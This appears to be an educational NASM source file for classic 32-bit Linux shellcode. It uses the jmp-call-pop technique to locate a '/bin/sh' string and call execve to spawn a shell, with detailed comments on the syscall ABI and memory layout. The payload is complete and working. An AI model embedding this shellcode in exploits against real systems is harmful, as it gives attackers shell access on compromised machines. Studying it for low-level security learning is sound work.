; For some reason I cannot make .text section both exec and writable.
; So instead of fighting with ld and nasm I decided to use my own section '.shcode'
; Linux allows _start symbol to be contained in any executable section.
; So this program runs without problems on 32-bit Linux.
; You can run shellcode as a standalone program.
; This is only possible because the memory backing ELF sections is mapped
; in whole pages (typically 4 kB). Otherwise the stores that land
; beyond the bytes emitted by db '/bin/sh' would hit unmapped memory
; and cause a segmentation fault.
section .shcode progbits alloc exec write   ; custom section that is both executable and writable (see header)
global _start

;-----------------------------------------------------------------------
; _start -- standalone entry point, 32-bit Linux, int 0x80 syscall ABI
;           (eax = syscall number, ebx/ecx/edx = arguments 1..3).
; Flow:    jmp forward to _sh_last, whose `call` pushes the address of the
;          string that follows it; _sh_start pops that address into esi.
; Layout relative to esi (the '/bin/sh' bytes at the end of the section):
;   esi+0x0..0x6  '/bin/sh'     7 bytes emitted by db
;   esi+0x7       0x00          NUL terminator, written at run time
;   esi+0x8       esi           argv[0] -> "/bin/sh"
;   esi+0xc       0x00000000    argv[1] = NULL; the same cell is passed as envp
; The stores to esi+0x7 .. esi+0xf lie past the end of the emitted data and
; depend on the section being writable and page-granular (see header comment).
; Clobbers: eax, ebx, ecx, edx, esi. Does not return: either execve replaces
; the process image or exit(0) terminates it.
;-----------------------------------------------------------------------
_start:
jmp short _sh_last                 ; jump forward so the string address can be recovered via call/pop
_sh_start:
pop esi                            ; esi = return address pushed by `call` = address of '/bin/sh'
mov dword [esi+0x8], esi           ; argv[0] = pointer to the string
mov byte [esi+0x7], 0x0            ; NUL-terminate the 7-byte string
mov dword [esi+0xc], 0x0           ; argv[1] = NULL; also the single (NULL) entry of envp
mov eax, 0xb ; execve(filename, argv, envp)
mov ebx, esi                       ; filename = "/bin/sh"
lea ecx, [esi+0x8]                 ; argv     = &argv[0]
lea edx, [esi+0xc]                 ; envp     = pointer to the NULL at esi+0xc (empty environment)
int 0x80                           ; execution only continues here if execve returned an error
mov eax, 0x1 ; exit(0)
mov ebx, 0x0                       ; exit status = 0
int 0x80
_sh_last:
call _sh_start                     ; pushes the address of the next byte (the string) and enters _sh_start
db '/bin/sh' ; esi will point here